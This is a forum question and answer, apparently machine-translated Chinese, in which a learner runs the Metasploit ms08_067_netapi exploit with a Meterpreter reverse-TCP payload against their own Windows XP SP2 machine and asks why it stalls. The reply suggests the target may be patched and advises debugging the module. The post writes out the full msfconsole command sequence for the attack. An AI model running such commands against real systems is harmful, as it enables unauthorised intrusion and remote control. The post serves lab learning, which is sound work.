我正在学习从 Armitage 开始的 Metasploit 框架,以大致了解结构等。当我尝试运行漏洞利用程序时,我试图侵入我拥有的旧 Windowx XP sp2
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
我没有收到任何错误,但它停在那里并且没有执行漏洞利用。
请您参考如下方法:
所以看起来该漏洞利用不适用于您拥有的 Windows 版本。也许您可以尝试另一种,更简单的方法。这些漏洞是什么时候创建的?您绝对确定它们在您的 Windows 版本中未打补丁吗?
如果你想从运行其他人编写的漏洞利用脚本中学到任何东西,你必须开始调试并尝试理解脚本在做什么。在它说 Attempting to trigger the vulnerability
之后找出脚本到底在做什么,并尝试找出它可能无法工作的原因。这里有太多的可能性可以推测。